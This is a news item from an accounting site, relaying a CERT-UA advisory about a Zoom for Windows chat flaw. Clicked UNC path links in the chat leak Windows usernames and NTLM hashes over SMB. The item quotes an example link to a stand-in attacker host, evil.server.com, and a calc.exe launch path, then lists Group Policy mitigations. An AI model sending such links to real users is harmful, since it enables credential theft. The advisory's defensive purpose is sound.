Главная Все новости Учет и отчетность Автоматизация

Внимание! Появилась уязвимость в Zoom для Windows

Нажатие на ссылку с UNC путем может позволить злоумышленникам красть данные учетной записи Windows

Під час пандемії все більше людей починають працювати віддалено та проводити конференції чи засідання онлайн.

Zoom – одна з найпопулярніших програм для відеоконференцій. Версія даного програмного забезпечення для Windows має вразливість у чаті, в якому учасники зустрічей можуть спілкуватися між собою, надсилаючи текстові повідомлення.

Натискання на посилання із UNC шляхом може дозволити зловмисникам красти дані облікового запису Windows.

UNC – це літеральний рядок, який вказує розташування файлу в файловій системі, адреса каталогу.

Наприклад, звичайна URL-адреса, але із UNC шляхом (\\ evil.server.com \ images \ cat.jpg) перетворюються у гіперпосилання на яке можна натиснути аби відкрити веб-сторінку у своєму браузері, але в такому разі Windows спробує під'єднатися до віддаленого сайту за допомогою протоколу обміну файлами SMB, щоб відкрити віддалений файл cat.jpg.

Здійснюючи це, Windows за замовчуваннямнадсилає ім’я користувача та хеш паролю NTLM, який можна відновити за допомогою безкоштовних інструментів, таких як Hashcat.

Наприклад посилання (\\ 127.0.0.1 \ C $ \ windows \ system32 \ calc.exe) запропонує користувачеві запустити калькулятор.

 

Що робити?

Не відкривайте посилання, які починаються з “\\”. Будьте пильними, поки ZOOM готує оновлення безпеки.

Заборонити вихідний NTLM трафік до віддалених серверів, налаштувавши відповідну групову політику: Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options → Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers. У випадаючому меню вибрати “Deny all”.

Але це може створити проблеми з доступом до спільних ресурсів по протоколу SMB, як додати виключення описано тут.

Більше інформації за посиланнями:

Джерело
CERT-UA
Рубрика:
Учет и отчетность / Автоматизация
Теги:
Электронный документ

Обратите внимание: новостная лента «Дебет-Кредит» содержит не только редакционные материалы, но также статьи сторонних авторов, разъяснения сотрудников фискальной службы и т.п.

Данные материалы, а также комментарии к ним, отражают исключительно точку зрения их авторов и могут не совпадать с точкой зрения редакции.

Редакция не идентифицирует лица комментаторов, а не модерирует тексты комментариев и не несет ответственности за их содержание.

Новини від Дт-Кт «Дебету-Кредиту» – тепер у Viber!

Комментарии: 0

Новости по теме

Консультации по теме

Встигніть придбати
Податковий кодекс-2020!
закрити +